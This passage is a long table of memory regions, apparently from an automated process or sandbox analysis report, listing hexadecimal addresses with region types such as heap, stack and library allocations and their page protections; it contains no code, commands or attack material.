page read and write
|
||
1B6F2000
|
heap
|
page read and write
|
||
AB2367E000
|
stack
|
page read and write
|
||
D03000
|
heap
|
page read and write
|
||
319A000
|
trusted library allocation
|
page read and write
|
||
212BEEE0000
|
heap
|
page read and write
|
||
BEC000
|
stack
|
page read and write
|
||
804000
|
unkown
|
page write copy
|
||
212A1470000
|
heap
|
page read and write
|
||
7FFEB87F0000
|
trusted library allocation
|
page read and write
|
||
212BD584000
|
heap
|
page read and write
|
||
9AF027E000
|
unkown
|
page readonly
|
||
CF6157E000
|
unkown
|
page readonly
|
||
17F97C80000
|
heap
|
page read and write
|
||
24F94670000
|
heap
|
page read and write
|
||
7FFEB89F0000
|
trusted library allocation
|
page read and write
|
||
212BEF24000
|
heap
|
page read and write
|
||
7FFEB89F6000
|
trusted library allocation
|
page read and write
|
||
7FFEB87F4000
|
trusted library allocation
|
page read and write
|
||
7FFEB8804000
|
trusted library allocation
|
page read and write
|
||
212BBFFF000
|
heap
|
page read and write
|
||
E85000
|
heap
|
page read and write
|
||
1B469000
|
heap
|
page read and write
|
||
22170465000
|
heap
|
page read and write
|
||
227B8F02000
|
heap
|
page read and write
|
||
7FFEB8B74000
|
trusted library allocation
|
page read and write
|
||
212BF052000
|
heap
|
page read and write
|
||
17ED000
|
stack
|
page read and write
|
||
AB2337D000
|
stack
|
page read and write
|
||
4D9D000
|
stack
|
page read and write
|
||
227B787D000
|
heap
|
page read and write
|
||
3182000
|
trusted library allocation
|
page read and write
|
||
F43B2FE000
|
unkown
|
page readonly
|
||
F43ADFE000
|
unkown
|
page readonly
|
||
DD0000
|
heap
|
page read and write
|
||
E6E000
|
stack
|
page read and write
|
||
16E4000
|
trusted library allocation
|
page read and write
|
||
45B7000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B80000
|
trusted library allocation
|
page read and write
|
||
212A341C000
|
trusted library allocation
|
page read and write
|
||
212BD667000
|
heap
|
page read and write
|
||
212A329F000
|
trusted library allocation
|
page read and write
|
||
1B439000
|
heap
|
page read and write
|
||
227B811A000
|
heap
|
page read and write
|
||
33B6000
|
trusted library allocation
|
page read and write
|
||
7FFEB87FD000
|
trusted library allocation
|
page execute and read and write
|
||
24F94648000
|
heap
|
page read and write
|
||
212A3944000
|
trusted library allocation
|
page read and write
|
||
7FFEB880D000
|
trusted library allocation
|
page execute and read and write
|
||
D90000
|
heap
|
page read and write
|
||
7FFEB87FD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB88D6000
|
trusted library allocation
|
page execute and read and write
|
||
227B7895000
|
heap
|
page read and write
|
||
1C80D000
|
stack
|
page read and write
|
||
10D4000
|
heap
|
page read and write
|
||
212BB9C3000
|
heap
|
page read and write
|
||
1727000
|
trusted library allocation
|
page execute and read and write
|
||
1F7E000
|
stack
|
page read and write
|
||
24F94641000
|
heap
|
page read and write
|
||
1B4E5000
|
heap
|
page read and write
|
||
212A1650000
|
heap
|
page read and write
|
||
10D0000
|
trusted library section
|
page read and write
|
||
1F8A4E02000
|
heap
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
12EE000
|
stack
|
page read and write
|
||
7FFEB89B0000
|
trusted library allocation
|
page read and write
|
||
212A16AC000
|
heap
|
page read and write
|
||
7FFEB87E4000
|
trusted library allocation
|
page read and write
|
||
22170C15000
|
heap
|
page read and write
|
||
CF6098B000
|
stack
|
page read and write
|
||
1AEED000
|
stack
|
page read and write
|
||
AE4000
|
heap
|
page read and write
|
||
227B8D20000
|
trusted library allocation
|
page read and write
|
||
1B484000
|
heap
|
page read and write
|
||
7FFEB88A0000
|
trusted library allocation
|
page read and write
|
||
4C40000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A50000
|
trusted library allocation
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
7FFEB8C90000
|
trusted library allocation
|
page read and write
|
||
1B62E000
|
stack
|
page read and write
|
||
212B34A0000
|
trusted library allocation
|
page read and write
|
||
227B8F1B000
|
heap
|
page read and write
|
||
F43A47D000
|
stack
|
page read and write
|
||
7FFEB8B8C000
|
trusted library allocation
|
page read and write
|
||
24F94654000
|
heap
|
page read and write
|
||
AB2397E000
|
stack
|
page read and write
|
||
10FD000
|
stack
|
page read and write
|
||
13E4000
|
trusted library allocation
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
7FFEB88AC000
|
trusted library allocation
|
page execute and read and write
|
||
F43AEFD000
|
stack
|
page read and write
|
||
24F94630000
|
heap
|
page read and write
|
||
1B520000
|
heap
|
page read and write
|
||
2E72000
|
unkown
|
page readonly
|
||
1B72E000
|
stack
|
page read and write
|
||
212F000
|
trusted library allocation
|
page read and write
|
||
212BD55B000
|
heap
|
page read and write
|
||
1BDCA000
|
heap
|
page read and write
|
||
1309000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
9AEFDEE000
|
stack
|
page read and write
|
||
212A3210000
|
heap
|
page execute and read and write
|
||
212BEFED000
|
heap
|
page read and write
|
||
13F0000
|
trusted library allocation
|
page read and write
|
||
212A3473000
|
trusted library allocation
|
page read and write
|
||
212BEFF6000
|
heap
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
3442000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A5D000
|
trusted library allocation
|
page read and write
|
||
5AFD000
|
stack
|
page read and write
|
||
212B3449000
|
trusted library allocation
|
page read and write
|
||
CF61C7E000
|
unkown
|
page readonly
|
||
24F94673000
|
heap
|
page read and write
|
||
30F8000
|
trusted library allocation
|
page read and write
|
||
804000
|
unkown
|
page read and write
|
||
212A1736000
|
heap
|
page read and write
|
||
45C1000
|
trusted library allocation
|
page read and write
|
||
24F9469D000
|
heap
|
page read and write
|
||
212BD62A000
|
heap
|
page read and write
|
||
251000
|
unkown
|
page execute read
|
||
2A71000
|
trusted library allocation
|
page read and write
|
||
2940000
|
heap
|
page execute and read and write
|
||
CF6277E000
|
stack
|
page read and write
|
||
1C616000
|
stack
|
page read and write
|
||
2E90000
|
trusted library allocation
|
page read and write
|
||
227B7913000
|
heap
|
page read and write
|
||
24F9469F000
|
heap
|
page read and write
|
||
7FFEB8991000
|
trusted library allocation
|
page read and write
|
||
227B8F14000
|
heap
|
page read and write
|
||
9CD3FFE000
|
unkown
|
page readonly
|
||
CA0000
|
heap
|
page read and write
|
||
1B524000
|
heap
|
page read and write
|
||
7FFEB8A70000
|
trusted library allocation
|
page read and write
|
||
7FFEB87E0000
|
trusted library allocation
|
page read and write
|
||
24F94695000
|
heap
|
page read and write
|
||
227B8640000
|
trusted library allocation
|
page read and write
|
||
1B6B0000
|
heap
|
page read and write
|
||
7FFEB89EC000
|
trusted library allocation
|
page read and write
|
||
1BD8D000
|
heap
|
page read and write
|
||
2A5F000
|
trusted library allocation
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
1315000
|
heap
|
page read and write
|
||
4500000
|
trusted library allocation
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page execute and read and write
|
||
16B5000
|
heap
|
page read and write
|
||
1F8A4C90000
|
heap
|
page read and write
|
||
212A3986000
|
trusted library allocation
|
page read and write
|
||
227BD090000
|
trusted library allocation
|
page read and write
|
||
212BEF4C000
|
heap
|
page read and write
|
||
D8B000
|
heap
|
page read and write
|
||
7FFEB8A30000
|
trusted library allocation
|
page read and write
|
||
199F000
|
stack
|
page read and write
|
||
24F94665000
|
heap
|
page read and write
|
||
AEE000
|
heap
|
page read and write
|
||
7FFEB88A6000
|
trusted library allocation
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
4C50000
|
trusted library allocation
|
page read and write
|
||
212BB250000
|
trusted library allocation
|
page read and write
|
||
1600000
|
heap
|
page read and write
|
||
3183000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B80000
|
trusted library allocation
|
page read and write
|
||
1660000
|
trusted library allocation
|
page read and write
|
||
1B44C000
|
heap
|
page read and write
|
||
E77000
|
heap
|
page read and write
|
||
CF61AFE000
|
stack
|
page read and write
|
||
7FF44FFC0000
|
trusted library allocation
|
page execute and read and write
|
||
D2B000
|
heap
|
page read and write
|
||
212A346A000
|
trusted library allocation
|
page read and write
|
||
1707000
|
heap
|
page read and write
|
||
E8B000
|
heap
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
7FFEB8910000
|
trusted library allocation
|
page execute and read and write
|
||
267EA822000
|
heap
|
page read and write
|
||
7FFEB89B2000
|
trusted library allocation
|
page read and write
|
||
221703A0000
|
trusted library allocation
|
page read and write
|
||
1BEB0000
|
heap
|
page read and write
|
||
147E000
|
stack
|
page read and write
|
||
7FFEB8A06000
|
trusted library allocation
|
page read and write
|
||
D73000
|
heap
|
page read and write
|
||
1B8C0000
|
unkown
|
page readonly
|
||
4590000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8B70000
|
trusted library allocation
|
page read and write
|
||
7FFEB8C00000
|
trusted library allocation
|
page read and write
|
||
D86000
|
heap
|
page read and write
|
||
212A346F000
|
trusted library allocation
|
page read and write
|
||
CF6197E000
|
unkown
|
page readonly
|
||
227B78DC000
|
heap
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
806000
|
unkown
|
page readonly
|
||
212A1570000
|
heap
|
page read and write
|
||
24F9466B000
|
heap
|
page read and write
|
||
7FFEB8920000
|
trusted library allocation
|
page execute and read and write
|
||
1367000
|
heap
|
page read and write
|
||
261000
|
unkown
|
page read and write
|
||
9AF077E000
|
stack
|
page read and write
|
||
1239000
|
heap
|
page read and write
|
||
C5C000
|
stack
|
page read and write
|
||
212A1750000
|
trusted library allocation
|
page read and write
|
||
9CD39FE000
|
unkown
|
page readonly
|
||
B26000
|
heap
|
page read and write
|
||
212BBFEB000
|
heap
|
page read and write
|
||
7FFEB8B60000
|
trusted library allocation
|
page read and write
|
||
7FFEB881A000
|
trusted library allocation
|
page read and write
|
||
1D2E0000
|
heap
|
page read and write
|
||
24F94657000
|
heap
|
page read and write
|
||
212A398A000
|
trusted library allocation
|
page read and write
|
||
24F9464C000
|
heap
|
page read and write
|
||
1F8A4E34000
|
heap
|
page read and write
|
||
212BBFDF000
|
heap
|
page read and write
|
||
F43AFFE000
|
unkown
|
page readonly
|
||
1BD72000
|
heap
|
page read and write
|
||
1415000
|
trusted library allocation
|
page execute and read and write
|
||
1BB00000
|
unkown
|
page readonly
|
||
1673000
|
trusted library allocation
|
page read and write
|
||
212A36CE000
|
trusted library allocation
|
page read and write
|
||
172B000
|
trusted library allocation
|
page execute and read and write
|
||
D66000
|
heap
|
page read and write
|
||
227BE000000
|
heap
|
page read and write
|
||
227B8EF0000
|
heap
|
page read and write
|
||
7FFEB8CB0000
|
trusted library allocation
|
page execute and read and write
|
||
1B74B000
|
heap
|
page read and write
|
||
213C000
|
trusted library allocation
|
page read and write
|
||
4C00000
|
trusted library allocation
|
page read and write
|
||
7FFEB889C000
|
trusted library allocation
|
page execute and read and write
|
||
1BDCD000
|
heap
|
page read and write
|
||
EAE000
|
stack
|
page read and write
|
||
CF60F7E000
|
unkown
|
page readonly
|
||
24F946A4000
|
heap
|
page read and write
|
||
7FFEB8A76000
|
trusted library allocation
|
page read and write
|
||
CF6237E000
|
unkown
|
page readonly
|
||
1E70000
|
heap
|
page read and write
|
||
1F8A4E7F000
|
heap
|
page read and write
|
||
24F94660000
|
heap
|
page read and write
|
||
1BEB5000
|
heap
|
page read and write
|
||
7FFEB8813000
|
trusted library allocation
|
page read and write
|
||
1AFDD000
|
stack
|
page read and write
|
||
7FFEB8A50000
|
trusted library allocation
|
page read and write
|
||
780000
|
unkown
|
page readonly
|
||
9CD3EFE000
|
stack
|
page read and write
|
||
227BD080000
|
trusted library allocation
|
page read and write
|
||
7FFEB8810000
|
trusted library allocation
|
page read and write
|
||
227B8ED8000
|
heap
|
page read and write
|
||
1F8A4CB0000
|
heap
|
page read and write
|
||
1B82E000
|
stack
|
page read and write
|
||
9CD3DFE000
|
unkown
|
page readonly
|
||
1700000
|
heap
|
page read and write
|
||
22170400000
|
heap
|
page read and write
|
||
227B8EF4000
|
heap
|
page read and write
|
||
2C44000
|
trusted library allocation
|
page read and write
|
||
227B8E69000
|
heap
|
page read and write
|
||
13D8000
|
heap
|
page read and write
|
||
7FFEB8A00000
|
trusted library allocation
|
page read and write
|
||
1BC9F000
|
stack
|
page read and write
|
||
781000
|
stack
|
page read and write
|
||
267EC402000
|
trusted library allocation
|
page read and write
|
||
212A16D5000
|
heap
|
page read and write
|
||
10F1000
|
stack
|
page read and write
|
||
7FFEB8995000
|
trusted library allocation
|
page read and write
|
||
212A347B000
|
trusted library allocation
|
page read and write
|
||
28C0000
|
unkown
|
page readonly
|
||
43E6000
|
trusted library allocation
|
page read and write
|
||
17F97A18000
|
heap
|
page read and write
|
||
267EA840000
|
heap
|
page read and write
|
||
7FFEB8A30000
|
trusted library allocation
|
page read and write
|
||
212BD747000
|
heap
|
page read and write
|
||
212BD560000
|
heap
|
page read and write
|
||
24F9466D000
|
heap
|
page read and write
|
||
CE9000
|
heap
|
page read and write
|
||
227B8EE8000
|
heap
|
page read and write
|
||
2E80000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B50000
|
trusted library allocation
|
page read and write
|
||
1F8A4E60000
|
heap
|
page read and write
|
||
DD5000
|
heap
|
page read and write
|
||
227B8100000
|
heap
|
page read and write
|
||
7FFEB89DE000
|
trusted library allocation
|
page read and write
|
||
1C90E000
|
stack
|
page read and write
|
||
227B8F4D000
|
heap
|
page read and write
|
||
7FFEB89A3000
|
trusted library allocation
|
page read and write
|
||
1B455000
|
heap
|
page read and write
|
||
1B6B6000
|
heap
|
page read and write
|
||
212BC115000
|
heap
|
page read and write
|
||
24F94649000
|
heap
|
page read and write
|
||
24F94702000
|
heap
|
page read and write
|
||
F43A9FE000
|
unkown
|
page readonly
|
||
227B78BA000
|
heap
|
page read and write
|
||
7FFEB89D8000
|
trusted library allocation
|
page read and write
|
||
22170370000
|
heap
|
page read and write
|
||
212BB95F000
|
heap
|
page read and write
|
||
212BEFF0000
|
heap
|
page read and write
|
||
34EE000
|
stack
|
page read and write
|
||
227B8F40000
|
heap
|
page read and write
|
||
1410000
|
trusted library allocation
|
page read and write
|
||
18D1F8E000
|
stack
|
page read and write
|
||
25B000
|
unkown
|
page readonly
|
||
212A397A000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A60000
|
trusted library allocation
|
page read and write
|
||
F10000
|
heap
|
page read and write
|
||
5402000
|
unkown
|
page readonly
|
||
106E000
|
stack
|
page read and write
|
||
1BDC3000
|
heap
|
page read and write
|
||
AB2377F000
|
stack
|
page read and write
|
||
12CD000
|
heap
|
page read and write
|
||
7FFEB8A40000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
7FFEB89C0000
|
trusted library allocation
|
page read and write
|
||
9CD37FE000
|
unkown
|
page readonly
|
||
9D0000
|
heap
|
page read and write
|
||
7FFEB8B90000
|
trusted library allocation
|
page read and write
|
||
7FFEB881D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8B30000
|
trusted library allocation
|
page read and write
|
||
212A329D000
|
trusted library allocation
|
page read and write
|
||
212BB9A2000
|
heap
|
page read and write
|
||
227B78D0000
|
heap
|
page read and write
|
||
CF61EFE000
|
stack
|
page read and write
|
||
227BD150000
|
remote allocation
|
page read and write
|
||
124E000
|
stack
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
7FFEB882B000
|
trusted library allocation
|
page execute and read and write
|
||
DC0000
|
heap
|
page read and write
|
||
212B32BC000
|
trusted library allocation
|
page read and write
|
||
212BBF90000
|
heap
|
page read and write
|
||
CF619FE000
|
stack
|
page read and write
|
||
16E0000
|
trusted library allocation
|
page read and write
|
||
1C313000
|
heap
|
page execute and read and write
|
||
7F1000
|
unkown
|
page execute read
|
||
584E000
|
stack
|
page read and write
|
||
212BB972000
|
heap
|
page read and write
|
||
1BBAE000
|
stack
|
page read and write
|
||
442B000
|
trusted library allocation
|
page read and write
|
||
4C30000
|
trusted library allocation
|
page read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
7FFEB89B3000
|
trusted library allocation
|
page read and write
|
||
C53000
|
heap
|
page read and write
|
||
267EA740000
|
heap
|
page read and write
|
||
7FFEB8804000
|
trusted library allocation
|
page read and write
|
||
1B41E000
|
stack
|
page read and write
|
||
212A17C0000
|
heap
|
page read and write
|
||
1390000
|
heap
|
page read and write
|
||
7FFEB8B00000
|
trusted library allocation
|
page read and write
|
||
7FFEB8910000
|
trusted library allocation
|
page execute and read and write
|
||
227B8DC4000
|
trusted library allocation
|
page read and write
|
||
7FFEB87F3000
|
trusted library allocation
|
page execute and read and write
|
||
1C057000
|
heap
|
page read and write
|
||
7FFEB885C000
|
trusted library allocation
|
page execute and read and write
|
||
227B8DC0000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
F43A8FE000
|
stack
|
page read and write
|
||
28F2000
|
unkown
|
page readonly
|
||
1670000
|
trusted library allocation
|
page read and write
|
||
2138000
|
trusted library allocation
|
page read and write
|
||
7FFEB88E6000
|
trusted library allocation
|
page execute and read and write
|
||
2217042B000
|
heap
|
page read and write
|
||
212B344C000
|
trusted library allocation
|
page read and write
|
||
570E000
|
stack
|
page read and write
|
||
7FFEB8C20000
|
trusted library allocation
|
page execute and read and write
|
||
212BC002000
|
heap
|
page read and write
|
||
24F94637000
|
heap
|
page read and write
|
||
212BB8E0000
|
heap
|
page read and write
|
||
10EE000
|
stack
|
page read and write
|
||
7FFEB8BB0000
|
trusted library allocation
|
page read and write
|
||
1712000
|
trusted library allocation
|
page read and write
|
||
227B8D90000
|
trusted library allocation
|
page read and write
|
||
227B811A000
|
heap
|
page read and write
|
||
F43AB7E000
|
stack
|
page read and write
|
||
1400000
|
trusted library allocation
|
page read and write
|
||
227B8E70000
|
heap
|
page read and write
|
||
142E000
|
stack
|
page read and write
|
||
4BE0000
|
trusted library allocation
|
page read and write
|
||
18D1F0C000
|
stack
|
page read and write
|
||
1BDC8000
|
heap
|
page read and write
|
||
212A1600000
|
trusted library allocation
|
page read and write
|
||
15E0000
|
heap
|
page read and write
|
||
212B3221000
|
trusted library allocation
|
page read and write
|
||
25B000
|
unkown
|
page readonly
|
||
227B8DC2000
|
trusted library allocation
|
page read and write
|
||
1A9E000
|
stack
|
page read and write
|
||
227B77F0000
|
heap
|
page read and write
|
||
1B61E000
|
stack
|
page read and write
|
||
212A1690000
|
heap
|
page read and write
|
||
212B33C3000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A20000
|
trusted library allocation
|
page execute and read and write
|
||
1D1B5000
|
heap
|
page read and write
|
||
7FFEB89E0000
|
trusted library allocation
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
212B344F000
|
trusted library allocation
|
page read and write
|
||
212A1A80000
|
heap
|
page read and write
|
||
212BEE92000
|
heap
|
page read and write
|
||
227B8EFB000
|
heap
|
page read and write
|
||
7FFEB89E8000
|
trusted library allocation
|
page read and write
|
||
CF6137E000
|
unkown
|
page readonly
|
||
F43A07B000
|
stack
|
page read and write
|
||
4429000
|
trusted library allocation
|
page read and write
|
||
7FFEB88B0000
|
trusted library allocation
|
page execute and read and write
|
||
29C0000
|
unkown
|
page readonly
|
||
7FFEB89D0000
|
trusted library allocation
|
page read and write
|
||
AB229FD000
|
stack
|
page read and write
|
||
1F8A4E00000
|
heap
|
page read and write
|
||
227B8F11000
|
heap
|
page read and write
|
||
7FFEB89E0000
|
trusted library allocation
|
page read and write
|
||
212BEEBA000
|
heap
|
page read and write
|
||
24F94673000
|
heap
|
page read and write
|
||
1722000
|
trusted library allocation
|
page read and write
|
||
12FC000
|
heap
|
page read and write
|
||
810000
|
unkown
|
page readonly
|
||
CF61BFE000
|
stack
|
page read and write
|
||
227B8DC0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B83000
|
trusted library allocation
|
page read and write
|
||
7FFEB89B6000
|
trusted library allocation
|
page read and write
|
||
2043000
|
trusted library allocation
|
page read and write
|
||
212A1677000
|
heap
|
page read and write
|
||
4BDE000
|
stack
|
page read and write
|
||
227BD0E0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A24000
|
trusted library allocation
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
4415000
|
trusted library allocation
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
7FFEB88BC000
|
trusted library allocation
|
page execute and read and write
|
||
AC7000
|
heap
|
page read and write
|
||
7FFEB8AD0000
|
trusted library allocation
|
page read and write
|
||
1C05B000
|
heap
|
page read and write
|
||
2FE0000
|
trusted library allocation
|
page read and write
|
||
A80000
|
trusted library allocation
|
page read and write
|
||
212BD75A000
|
heap
|
page read and write
|
||
2F28000
|
trusted library allocation
|
page read and write
|
||
7FFEB8814000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A40000
|
trusted library allocation
|
page read and write
|
||
1D6E000
|
stack
|
page read and write
|
||
212BD67B000
|
heap
|
page read and write
|
||
227B8F1B000
|
heap
|
page read and write
|
||
13E0000
|
trusted library allocation
|
page read and write
|
||
AB22F7E000
|
stack
|
page read and write
|
||
E4E000
|
heap
|
page read and write
|
||
7FFEB8990000
|
trusted library allocation
|
page read and write
|
||
120E000
|
stack
|
page read and write
|
||
128E000
|
stack
|
page read and write
|
||
212A1550000
|
heap
|
page read and write
|
||
7FFEB8A10000
|
trusted library allocation
|
page read and write
|
||
24F94659000
|
heap
|
page read and write
|
||
22170490000
|
heap
|
page read and write
|
||
594B000
|
stack
|
page read and write
|
||
227B8DB0000
|
trusted library allocation
|
page read and write
|
||
1DB0000
|
heap
|
page execute and read and write
|
||
212BD56C000
|
heap
|
page read and write
|
||
138F000
|
stack
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
CF62979000
|
stack
|
page read and write
|
||
178E000
|
stack
|
page read and write
|
||
22170430000
|
heap
|
page read and write
|
||
7FFEB8B30000
|
trusted library allocation
|
page read and write
|
||
18C8000
|
stack
|
page read and write
|
||
14BE000
|
stack
|
page read and write
|
||
7FD000
|
unkown
|
page readonly
|
||
7FFEB8A00000
|
trusted library allocation
|
page read and write
|
||
227B811A000
|
heap
|
page read and write
|
||
F6E000
|
stack
|
page read and write
|
||
1F8A4E6B000
|
heap
|
page read and write
|
||
7FFEB8A40000
|
trusted library allocation
|
page read and write
|
||
4A9F000
|
stack
|
page read and write
|
||
7FFEB89F0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A30000
|
trusted library allocation
|
page read and write
|
||
46B0000
|
unkown
|
page readonly
|
||
7FFEB8803000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB88D6000
|
trusted library allocation
|
page execute and read and write
|
||
43E2000
|
trusted library allocation
|
page read and write
|
||
7FFEB89F0000
|
trusted library allocation
|
page read and write
|
||
227B8E54000
|
heap
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
7FFEB88C0000
|
trusted library allocation
|
page execute and read and write
|
||
1306000
|
heap
|
page read and write
|
||
1BCAE000
|
stack
|
page read and write
|
||
227B78C6000
|
heap
|
page read and write
|
||
212A1A85000
|
heap
|
page read and write
|
||
7FFEB8800000
|
trusted library allocation
|
page read and write
|
||
2084000
|
trusted library allocation
|
page read and write
|
||
212A36CC000
|
trusted library allocation
|
page read and write
|
||
580B000
|
stack
|
page read and write
|
||
1C310000
|
heap
|
page execute and read and write
|
||
212A168B000
|
heap
|
page read and write
|
||
227B7800000
|
heap
|
page read and write
|
||
212BB8FA000
|
heap
|
page read and write
|
||
1F8A4E56000
|
heap
|
page read and write
|
||
1BA90000
|
heap
|
page execute and read and write
|
||
267EA88C000
|
heap
|
page read and write
|
||
267EA872000
|
heap
|
page read and write
|
||
227B7813000
|
heap
|
page read and write
|
||
7FFEB89F0000
|
trusted library allocation
|
page read and write
|
||
9AF097E000
|
stack
|
page read and write
|
||
7FFEB88AC000
|
trusted library allocation
|
page execute and read and write
|
||
1F8A4D90000
|
heap
|
page read and write
|
||
F43AAFE000
|
unkown
|
page readonly
|
||
212BB938000
|
heap
|
page read and write
|
||
14DE000
|
stack
|
page read and write
|
||
CF620FB000
|
stack
|
page read and write
|
||
9CD36F6000
|
stack
|
page read and write
|
||
AB228FE000
|
stack
|
page read and write
|
||
AB227FB000
|
stack
|
page read and write
|
||
212A18A0000
|
heap
|
page read and write
|
||
13E3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB899C000
|
trusted library allocation
|
page read and write
|
||
7FFEB89B0000
|
trusted library allocation
|
page read and write
|
||
1C418000
|
stack
|
page read and write
|
||
227BD100000
|
trusted library allocation
|
page read and write
|
||
212BB9AE000
|
heap
|
page read and write
|
||
7FFEB8A0B000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A10000
|
trusted library allocation
|
page read and write
|
||
4630000
|
unkown
|
page readonly
|
||
7FFEB88B6000
|
trusted library allocation
|
page read and write
|
||
1B42D000
|
heap
|
page read and write
|
||
212BD651000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library section
|
page read and write
|
||
267EA902000
|
heap
|
page read and write
|
||
1B3E0000
|
heap
|
page execute and read and write
|
||
3041000
|
trusted library allocation
|
page read and write
|
||
407E000
|
stack
|
page read and write
|
||
24F94650000
|
heap
|
page read and write
|
||
212A3A26000
|
trusted library allocation
|
page read and write
|
||
7FFEB880D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB899E000
|
trusted library allocation
|
page read and write
|
||
10E5000
|
heap
|
page read and write
|
||
7FFEB8A88000
|
trusted library allocation
|
page read and write
|
||
212BEF2F000
|
heap
|
page read and write
|
||
2F91000
|
trusted library allocation
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
7FFEB87ED000
|
trusted library allocation
|
page execute and read and write
|
||
54BB000
|
stack
|
page read and write
|
||
22170270000
|
heap
|
page read and write
|
||
24F94600000
|
heap
|
page read and write
|
||
24F94634000
|
heap
|
page read and write
|
||
10FE000
|
heap
|
page read and write
|
||
12A57000
|
trusted library allocation
|
page read and write
|
||
CF625FE000
|
unkown
|
page readonly
|
||
1070000
|
heap
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
24F9465B000
|
heap
|
page read and write
|
||
60BE000
|
stack
|
page read and write
|
||
212BB8EE000
|
heap
|
page read and write
|
||
7FFEB89AB000
|
trusted library allocation
|
page read and write
|
||
227B8E7A000
|
heap
|
page read and write
|
||
7FFEB8BB0000
|
trusted library allocation
|
page read and write
|
||
30B0000
|
heap
|
page execute and read and write
|
||
212B3275000
|
trusted library allocation
|
page read and write
|
||
227BD062000
|
trusted library allocation
|
page read and write
|
||
212A1698000
|
heap
|
page read and write
|
||
CF622FE000
|
stack
|
page read and write
|
||
ADE000
|
heap
|
page read and write
|
||
1820000
|
heap
|
page read and write
|
||
227B7885000
|
heap
|
page read and write
|
||
7FFEB8B10000
|
trusted library allocation
|
page read and write
|
||
212A1880000
|
heap
|
page execute and read and write
|
||
954000
|
stack
|
page read and write
|
||
7FFEB8800000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B5E000
|
trusted library allocation
|
page read and write
|
||
1430000
|
trusted library allocation
|
page read and write
|
||
212BB967000
|
heap
|
page read and write
|
||
2F87000
|
trusted library allocation
|
page read and write
|
||
212BB96B000
|
heap
|
page read and write
|
||
16F0000
|
trusted library allocation
|
page read and write
|
||
212BEF07000
|
heap
|
page read and write
|
||
212A17F0000
|
heap
|
page execute and read and write
|
||
ED5E0FE000
|
stack
|
page read and write
|
||
D96000
|
heap
|
page read and write
|
||
212BBFB4000
|
heap
|
page read and write
|
||
7FFEB8BC0000
|
trusted library allocation
|
page read and write
|
||
152E000
|
stack
|
page read and write
|
||
12CE000
|
stack
|
page read and write
|
||
2217043C000
|
heap
|
page read and write
|
||
7FFEB8A81000
|
trusted library allocation
|
page read and write
|
||
2F26000
|
trusted library allocation
|
page read and write
|
||
303E000
|
stack
|
page read and write
|
||
1D1A0000
|
heap
|
page read and write
|
||
D58000
|
stack
|
page read and write
|
||
212A3417000
|
trusted library allocation
|
page read and write
|
||
24F9464E000
|
heap
|
page read and write
|
||
24F94661000
|
heap
|
page read and write
|
||
7FFEB8820000
|
trusted library allocation
|
page read and write
|
||
7FFEB8B50000
|
trusted library allocation
|
page read and write
|
||
212BB964000
|
heap
|
page read and write
|
||
212A1890000
|
trusted library section
|
page readonly
|
||
1B5CD000
|
stack
|
page read and write
|
||
17AE000
|
stack
|
page read and write
|
||
227B8EE6000
|
heap
|
page read and write
|
||
1DA0000
|
heap
|
page execute and read and write
|
||
2EB9000
|
trusted library allocation
|
page read and write
|
||
212A1729000
|
heap
|
page read and write
|
||
24F94652000
|
heap
|
page read and write
|
||
59BE000
|
stack
|
page read and write
|
||
267EA917000
|
heap
|
page read and write
|
||
227BD000000
|
trusted library allocation
|
page read and write
|
||
10FA000
|
heap
|
page read and write
|
||
212A362E000
|
trusted library allocation
|
page read and write
|
||
227B8015000
|
heap
|
page read and write
|
||
7FFEB8B70000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A91000
|
trusted library allocation
|
page read and write
|
||
267EA861000
|
heap
|
page read and write
|
||
DF6000
|
heap
|
page read and write
|
||
CF6287E000
|
unkown
|
page readonly
|
||
227B8EE0000
|
heap
|
page read and write
|
||
1F8A4E48000
|
heap
|
page read and write
|
||
9CD3CFE000
|
stack
|
page read and write
|
||
267EA7A0000
|
trusted library allocation
|
page read and write
|
||
CF61B7E000
|
unkown
|
page readonly
|
||
2E60000
|
unkown
|
page readonly
|
||
7FFEB8AC0000
|
trusted library allocation
|
page read and write
|
||
7FFEB8A10000
|
trusted library allocation
|
page read and write
|
||
1B6E6000
|
heap
|
page read and write
|
||
7FFEB8BE0000
|
trusted library allocation
|
page read and write
|
||
780000
|
